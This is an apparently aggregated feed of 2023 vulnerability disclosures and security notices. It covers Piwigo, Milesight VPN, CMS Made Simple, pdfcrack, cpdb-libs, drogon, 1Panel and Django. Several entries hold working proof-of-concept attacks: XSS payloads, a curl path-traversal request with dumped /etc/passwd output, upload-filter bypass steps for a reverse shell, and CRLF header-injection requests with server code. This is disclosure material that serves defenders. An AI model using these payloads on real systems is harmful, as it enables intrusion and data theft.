Piwigo version 13.7.0 suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)#Date: 25 June 2023#Exploit Author: Okan Kurtulus#Vendor Homepage: https://piwigo.org#Version: 13.7.0#Tested on: Ubuntu 22.04#CVE : N/A# Proof of Concept:1– Install the system through the website and log in with any user authorized to upload photos.2–  Click "Add" under "Photos" from the left menu. The photo you want to upload is selected and uploaded.3– Click on the uploaded photo and the photo editing screen opens. XSS payload is entered in the "Description" section on this screen. After saving the file, go to the homepage and open the page with the photo. The XSS payload appears to be triggered.#Payload<sCriPt>alert(1);</sCriPt>

Piwigo 13.7.0 Cross Site Scripting

An issue in Zimbra Collaboration ZCS v.8.8.15 and v.9.0 allows an attacker to execute arbitrary code via the sfdc_preauth.jsp component.

CVE-2023-29382: Security Center - Zimbra :: Tech Center

A directory traversal vulnerability exists in the server.js start functionality of Milesight VPN v2.0.2. A specially-crafted network request can lead to arbitrary file read. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A directory traversal vulnerability exists in the server.js start functionality of Milesight VPN v2.0.2. A specially-crafted network request can lead to arbitrary file read. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Milesight VPN v2.0.2

**PRODUCT URLS**

MilesightVPN - https://www.milesight-iot.com/milesightvpn/

**CVSSv3 SCORE**

7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

**DETAILS**

The MilesightVPN is software that make the process easier of setting up the VPN tunnel for Milesight products, as well as allows monitoring the connection status with a web server interface.

The MilesightVPN’s server.js file has the start function that is the one responsible to manage the received requests:

    function start(route,handle,connection,generateToken,verifyToken,lang){
        const options={
            key:fs.readFileSync(path.join(__dirname,'./https/server.key')),
            cert:fs.readFileSync(path.join(__dirname,'./https/server.crt'))
        };
        var defaultpage={
            page:'index.html',
            login:'login.html',
            port:'18080',
            ssl_port:'18443'
        };
        disconnect(connection);
       [...]
        https.createServer(options,function(req,res){
            var method=req.method;
            var pathname=url.parse(req.url).pathname;
            [...]
            var ext=path.parse(pathname).ext;
            ext=ext.slice(1);
            [...]
            var realPath=path.join(__dirname,'../'+pathname);
            var cookie=req.headers.cookie;
            if(cookie)
            {
                [...]
            }
            else
            {
                if(ext=='html'&&(pathname.indexOf('login.html')<0&&pathname.indexOf('Device_Auth')<0))
                {
                    [...]
                }
            }
    
            if(method=='POST')
            {
                [...]
            }
            else
            {
                [...]
                if(ext=='html')
                {
                    [...]
                }
                fs.readFile(realPath,function(err,data){                                                    [1]
                    [...]
                    var contentType='';
                    switch(ext){
                        case 'html':
                            contentType='text/html';
                            break;
                        [...]
                        default:
                            contentType='text/plain';
                    }
                    res.writeHead(200,{'Content-Type':contentType});
                    res.end(data);
                });
            }
    
    
        }).listen(defaultpage.ssl_port);
    }
    

The function perform a series of check in the case the requested page extensions is html and in the case a cookie is provided. But, if the file does not have such extension and no cookie is provided, eventually, the code at [1] is reached and because no checks is performed against the provided path, this function is vulnerable to an unauthenticated directory path traversal.

**Exploit Proof of Concept**

Following a POC for the vulnerability exposed above:

    $ curl --path-as-is --insecure https://<SERVER_ADDRESS>/../etc/passwd  
    
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
    messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
    syslog:x:104:110::/home/syslog:/usr/sbin/nologin
    _apt:x:105:65534::/nonexistent:/usr/sbin/nologin
    tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
    uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
    tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
    sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
    landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
    pollinate:x:111:1::/var/cache/pollinate:/bin/false
    vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
    systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
    ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
    lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
    vboxadd:x:997:1::/var/run/vboxadd:/bin/false
    fwupd-refresh:x:112:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
    mysql:x:113:120:MySQL Server,,,:/nonexistent:/bin/false
    redis:x:1002:1002::/home/redis:/bin/false
    stund:x:1003:1003::/home/stund:/bin/false
    tunnel:x:1004:1004::/bin:/bin/false
    

The request’s response is the /etc/passwd content.

**VENDOR RESPONSE**

Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor\_vulnerability\_policy.html

**TIMELINE**

2023-02-14 - Initial Vendor Contact  
2023-02-21 - Vendor Disclosure  
2023-07-06 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-23907: TALOS-2023-1702 || Cisco Talos Intelligence Group

CMS Made Simple v2.2.17 is vulnerable to Remote Command Execution via the File Upload Function.

**#Exploit Title:** CMS Made Simple v2.2.17 – File Upload Remote Code Execution (Authenticated)

**#Date:** 25 June 2023

**#Exploit Author:** Okan Kurtulus

**#Vendor Homepage:** https://www.cmsmadesimple.org/

**#Version:** 2.2.17

**#Tested on:** Ubuntu 18.0.4

**#CVE:** 2023-36969

**#Proof of Concept:**

**1-)** Install the system through the website and log in with any user.

**2-)** After logging in, click “File Manager” under “Content” from the left menu.

**3-)** Some file extensions are blocked from uploading. PHP extension is among them. To bypass this, we change the extension to PHTML.

**4-)** When we call the shell file, the reverse shell is taken.

When we make a small query, we see that 11950 websites use the relevant application.

CVE-2023-36969: CMS Made Simple v2.2.17 – File Upload Remote Code Execution (RCE) (Authenticated)

A Cross-site scripting (XSS) vulnerability in CMS Made Simple v2.2.17 allows remote attackers to inject arbitrary web script or HTML via the File Upload function.

**#Exploit Title:** CMS Made Simple v2.2.17 – Stored Cross-Site Scripting (XSS) (Authenticated)

**#Date:** 25 June 2023

**#Exploit Author:** Okan Kurtulus

**#Vendor Homepage:** https://www.cmsmadesimple.org

**#Version:** 2.2.17

**#Tested on:** Ubuntu 18.04

**#CVE:** 2023-36970

**#Proof of Concept:**

**1-)** Install the system through the website and login with any user. (It is also possible to login with low authorized users.)

**2-)** After logging in, click “File Manager” under “Content” from the left menu.

**3-)** At first, I wanted to upload by adding the XSS payload to the file name, but I encountered an error. My guess is there is a control mechanism.

**4-)** Then I caught the normal file upload request with HTTP proxy. In the relevant request, I sent a payload to the filename parameter as follows.

1.txt<img src=x onerror=alert(1)>

**5-**) We see that Stored XSS is triggered when we click on the “File Manager” button under “Content” in the left menu.

CVE-2023-36970: CMS Made Simple v2.2.17 – Stored Cross-Site Scripting (XSS) (Authenticated)

An issue was discovered in pdfcrack 0.17 thru 0.18, allows attackers to execute arbitrary code via a stack overflow in the MD5 function.

*   Summary
*   Files
*   Reviews
*   Support
*   Tickets ▾
    *   Bugs
    *   Support Requests
    *   Patches
    *   Feature Requests
*   News
*   Discussion

Menu ▾ ▴

**#12 stack-buffer-overflow**

Status: closed

Priority: 9

Updated: 2020-04-24

Created: 2020-02-29

Private: No

hi, i find a stack over-flow when to calculate md5 value.  
crashed datas can find in https://github.com/p1ay8y3ar/crashdatas/tree/master/padcrack/29022020  
here is ASAN says

freedom@ubuntu:~/Downloads/pdfcrack\-0.18$ ./pdfcrack \-l /home/freedom/Desktop/pdfcrack/pdfcrack\-0.17/o/crashes/id\\:000000\\,sig\\:06\\,src\\:000072\\,op\\:ext\_AO\\,pos\\:28
\=================================================================
\==5441\==ERROR: AddressSanitizer: stack\-buffer\-overflow on address 0x7ffe99b24673 at pc 0x55929a48d42c bp 0x7ffe99b24430 sp 0x7ffe99b24420
READ of size 1 at 0x7ffe99b24673 thread T0
    #0 0x55929a48d42b in md5 /home/freedom/Downloads/pdfcrack\-0.18/md5.c:79
    #1 0x55929a48da1c in md5\_50s /home/freedom/Downloads/pdfcrack\-0.18/md5.c:202
    #2 0x55929a48e445 in isUserPasswordRev3 /home/freedom/Downloads/pdfcrack\-0.18/pdfcrack.c:261
    #3 0x55929a494d3a in initPDFCrack /home/freedom/Downloads/pdfcrack\-0.18/pdfcrack.c:678
    #4 0x55929a477b4d in main /home/freedom/Downloads/pdfcrack\-0.18/main.c:304
    #5 0x7f5726b4d1e2 in \_\_libc\_start\_main (/lib/x86\_64\-linux\-gnu/libc.so.6+0x271e2)
    #6 0x55929a47909d in \_start (/home/freedom/Downloads/pdfcrack\-0.18/pdfcrack+0x809d)

Address 0x7ffe99b24673 is located in stack of thread T0 at offset 83 in frame
    #0 0x55929a48e26f in isUserPasswordRev3 /home/freedom/Downloads/pdfcrack\-0.18/pdfcrack.c:253

  This frame has 3 object(s):
    \[32, 48) 'test' (line 254)
    \[64, 80) 'enckey' (line 254) <== Memory access at offset 83 overflows this variable
    \[96, 112) 'tmpkey' (line 254)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions \*are\* supported)
SUMMARY: AddressSanitizer: stack\-buffer\-overflow /home/freedom/Downloads/pdfcrack\-0.18/md5.c:79 in md5
Shadow bytes around the buggy address:
  0x10005335c870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10005335c880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10005335c890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
  0x10005335c8a0: f1 f1 00 00 00 00 00 00 00 00 f3 f3 f3 f3 00 00
  0x10005335c8b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x10005335c8c0: 00 00 00 00 f1 f1 f1 f1 00 00 f2 f2 00 00\[f2\]f2
  0x10005335c8d0: 00 00 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x10005335c8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
  0x10005335c8f0: f1 f1 00 00 f2 f2 00 00 f3 f3 00 00 00 00 00 00
  0x10005335c900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10005335c910: 00 00 00 00 00 00 f1 f1 f1 f1 01 f2 f8 f2 00 f2
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
\==5441\==ABORTING

**1 Attachments**

**Discussion**

Log in to post a comment.

CVE-2020-22336: pdfcrack / Bugs

Ubuntu Security Notice 6204-1 - Seth Arnold discovered that CPDB incorrectly handled certain characters. An attacker could possibly use this issue to cause a crash or execute arbitrary code.

=========================================================================  
Ubuntu Security Notice USN-6204-1  
July 05, 2023

cpdb-libs vulnerability  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

CPDB could be made to crash or execute arbitrary code.

Software Description:  
- cpdb-libs: Common Print Dialog Backends - Tools

Details:

Seth Arnold discovered that CPDB incorrectly handled certain characters.  
An attacker could possibly use this issue to cause a crash or execute  
arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  cpdb-libs-tools                 2.0~b4-0ubuntu2.1  
  libcpdb-frontend2               2.0~b4-0ubuntu2.1  
  libcpdb-libs-tools              2.0~b4-0ubuntu2.1  
  libcpdb2                        2.0~b4-0ubuntu2.1

Ubuntu 22.10:  
  libcpdb-libs-common1            1.2.0-0ubuntu8.1.22.10.1  
  libcpdb-libs-frontend1          1.2.0-0ubuntu8.1.22.10.1

Ubuntu 22.04 LTS:  
  libcpdb-libs-common1            1.2.0-0ubuntu8.1.22.04.1  
  libcpdb-libs-frontend1          1.2.0-0ubuntu8.1.22.04.1

Ubuntu 20.04 LTS:  
  libcpdb-libs-common1            1.2.0-0ubuntu7.1  
  libcpdb-libs-frontend1          1.2.0-0ubuntu7.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6204-1  
  CVE-2023-34095

Package Information:  
  https://launchpad.net/ubuntu/+source/cpdb-libs/2.0~b4-0ubuntu2.1  
  https://launchpad.net/ubuntu/+source/cpdb-libs/1.2.0-0ubuntu8.1.22.10.1  
  https://launchpad.net/ubuntu/+source/cpdb-libs/1.2.0-0ubuntu8.1.22.04.1  
  https://launchpad.net/ubuntu/+source/cpdb-libs/1.2.0-0ubuntu7.1

Ubuntu Security Notice USN-6204-1

All versions of the package drogonframework/drogon are vulnerable to HTTP Response Splitting when untrusted user input is used to build header values in the addHeader and addCookie functions. An attacker can add the \r\n (carriage return line feeds) characters to end the HTTP response headers and inject malicious content.

HTTP Response Splitting in drogon@v1.8.4

**Information**

**Project:** drogon

**Tested Version:** v1.8.4

**Github Repository:** https://github.com/drogonframework/drogon

**Details**

drogon is vulnerable to **HTTP Response Splitting** when untrusted user input is used to build headers values in the addHeader and addCookie functions. An attacker can add the \r\n (carriage return line feeds) characters to end the HTTP response headers and inject malicious content, like for example additional headers or new response body, leading to a potential XSS vulnerability.

More reference about this vulnerability and its impact:

*   https://owasp.org/www-community/attacks/HTTP\_Response\_Splitting
*   https://cwe.mitre.org/data/definitions/113.html

Reference to similar issues affecting other projects:

*   https://security.snyk.io/vuln/SNYK-SWIFT-APPLESWIFTNIO-3105796

**Setup**

*   install dependencies (tested on Ubuntu): https://github.com/drogonframework/drogon/wiki/ENG-02-Installation#system-preparation-examples
    
*   install the project: https://github.com/drogonframework/drogon/wiki/ENG-02-Installation#drogon-installation
    

**PoC**

The PoC demonstrates how it's possible to add arbitrary headers and response body if user controlled values are used to set the headers value.

*   create a web server:

drogon\_ctl --version
A utility for drogon
Version: 1.8.4
Git commit: 87a3132fd1c0da1a88e080c879a9e55af71586be

drogon\_ctl create project server

*   paste the server code in main.cc (inspired by https://github.com/drogonframework/drogon/blob/master/examples/helloworld/main.cc)
    
*   build and run the server
    

cd build
cmake ..
make
./server

*   run the following curl commands to observe the response (or directly open the links in the browser to see the xss alert)

curl -i -X GET "http://localhost:8889/test1?user=A%0d%0aSet-Cookie:+admin=1%0d%0aFoo:+Bar%0d%0a%0a%3Cimg+src%3dx+onerror%3dalert(%22hello%22)+/%3E%0d%0a"
HTTP/1.1 200 OK
content-length: 39
content-type: text/html; charset=utf-8
server: drogon/1.8.4
myheader: A
Set-Cookie: admin=1
Foo: Bar

<img src=x onerror=alert("hello") />

curl -i -X GET "http://localhost:8889/test2?user=A%0d%0aFoo:+Bar%0d%0a%0a%3Cimg+src%3dx+onerror%3dalert(%22hello%22)+/%3E%0d%0a"
HTTP/1.1 200 OK
content-length: 39
content-type: text/html; charset=utf-8
server: drogon/1.8.4
Set-Cookie: MyCookie=A
Foo: Bar

<img src=x onerror=alert("hello") />
;

curl -i -X GET "http://localhost:8889/test3?user=A%0d%0aSet-Cookie:+admin=1%0d%0aFoo:+Bar%0d%0a%0a%3Cimg+src%3dx+onerror%3dalert(%22hello%22)+/%3E%0d%0a"
HTTP/1.1 200 OK
content-length: 39
content-type: text/html; charset=utf-8
server: drogon/1.8.4
myheader: A
Set-Cookie: admin=1
Foo: Bar

<img src=x onerror=alert("hello") />

**Impact**

If untrusted user input is placed in header values, a malicious user could inject additional headers. It can lead to logical errors and other misbehaviours.

**Author**

Alessio Della Libera

#include <drogon/drogon.h>

using namespace drogon;

int main()

{

// curl -i -X GET "http://localhost:8889/test1?user=A%0d%0aSet-Cookie:+admin=1%0d%0aFoo:+Bar%0d%0a%0a%3Cimg+src%3dx+onerror%3dalert(%22hello%22)+/%3E%0d%0a"

app().registerHandler(

"/test1?user={user-name}",

\[\](const HttpRequestPtr &, std::function<void(const HttpResponsePtr &)\> &&callback, const std::string &name) {

auto resp \= HttpResponse::newHttpResponse();

resp\->addHeader("MyHeader", name);

resp\->setBody("Hello world!!!!!!!!!!!!!!!!!!!!!!!!!!!\\n");

callback(resp);

},

{Get});

// curl -i -X GET "http://localhost:8889/test2?user=A%0d%0aFoo:+Bar%0d%0a%0a%3Cimg+src%3dx+onerror%3dalert(%22hello%22)+/%3E%0d%0a"

app().registerHandler(

"/test2?user={user-name}",

\[\](const HttpRequestPtr &, std::function<void(const HttpResponsePtr &)\> &&callback, const std::string &name) {

auto resp \= HttpResponse::newHttpResponse();

resp\->addCookie("MyCookie", name);

resp\->setBody("Hello world!!!!!!!!!!!!!!!!!!!!!!!!!!!\\n");

callback(resp);

},

{Get});

// curl -i -X GET "http://localhost:8889/test3?user=A%0d%0aSet-Cookie:+admin=1%0d%0aFoo:+Bar%0d%0a%0a%3Cimg+src%3dx+onerror%3dalert(%22hello%22)+/%3E%0d%0a"

app().registerHandler(

"/test3",

\[\](const HttpRequestPtr &req,

std::function<void(const HttpResponsePtr &)\> &&callback) {

auto resp \= HttpResponse::newHttpResponse();

auto name \= req\->getOptionalParameter<std::string\>("user");

if (name)

resp\->addHeader("MyHeader", name.value());

resp\->setBody("Hello world!!!!!!!!!!!!!!!!!!!!!!!!!!!\\n");

callback(resp);

},

{Get});

LOG\_INFO << "Server running on 0.0.0.0:8889";

app().addListener("0.0.0.0", 8889).run();

}

CVE-2023-26137: HTTP Response Splitting in drogon@v1.8.4

1Panel is an open source Linux server operation and maintenance management panel. Prior to version 1.3.6, an authenticated attacker can craft a malicious payload to achieve command injection when adding container repositories. The vulnerability has been fixed in v1.3.6.

**一、安装和升级****1.1 一键安装**

**CentOS/RHEL**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sh quick\_start.sh

**Ubuntu**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sudo bash quick\_start.sh

**Debian**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && bash quick\_start.sh

**1.2 在线升级**

登录 1Panel Web 控制台，在页面右下角点击 **【检查更新】** 进行在线升级。

> 更多信息请查阅在线文档：https://1panel.cn/docs/

**二、更新日志****2.1 功能优化**

*   应用商店列表增加分页显示。 by @zhengkunwang223 in #1447
*   SSH 登录日志列表查询逻辑优化。 by @ssongliu in #1435

**2.2 问题修复**

*   修复了由于 docker 版本低导致应用无法正常操作的问题。 by @zhengkunwang223 in #1446
*   修复了执行备份根目录文件夹计划任务失败的问题。 by @ssongliu in #1444
*   修复了系统数据库文件无法正常读写时系统提示错误的问题。 by @ssongliu in #1438
*   修复了添加镜像仓库和进入容器终端存在命令注入的问题。 by @ssongliu in #1443
*   修复了设置容器镜像加速和私有仓库时由于空行导致 docker 无法正常启用的问题。 by @ssongliu in #1437

CVE-2023-36457: Release v1.3.6 · 1Panel-dev/1Panel

Ubuntu Security Notice 6203-1 - Seokchan Yoon discovered that Django incorrectly handled certain regular expressions. A remote attacker could possibly use this issue to cause Django to consume resources, leading to a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6203-1  
July 05, 2023

python-django vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Django could be made to consume resources if it received specially crafted  
network traffic.

Software Description:  
- python-django: High-level Python web development framework

Details:

Seokchan Yoon discovered that Django incorrectly handled certain regular  
expressions. A remote attacker could possibly use this issue to cause  
Django to consume resources, leading to a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   python3-django                  3:3.2.18-1ubuntu0.3

Ubuntu 22.10:  
   python3-django                  3:3.2.15-1ubuntu1.4

Ubuntu 22.04 LTS:  
   python3-django                  2:3.2.12-2ubuntu1.7

Ubuntu 20.04 LTS:  
   python3-django                  2:2.2.12-1ubuntu0.18

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6203-1  
   CVE-2023-36053

Package Information:  
   https://launchpad.net/ubuntu/+source/python-django/3:3.2.18-1ubuntu0.3  
   https://launchpad.net/ubuntu/+source/python-django/3:3.2.15-1ubuntu1.4  
   https://launchpad.net/ubuntu/+source/python-django/2:3.2.12-2ubuntu1.7  
   https://launchpad.net/ubuntu/+source/python-django/2:2.2.12-1ubuntu0.18

Tag

#ubuntu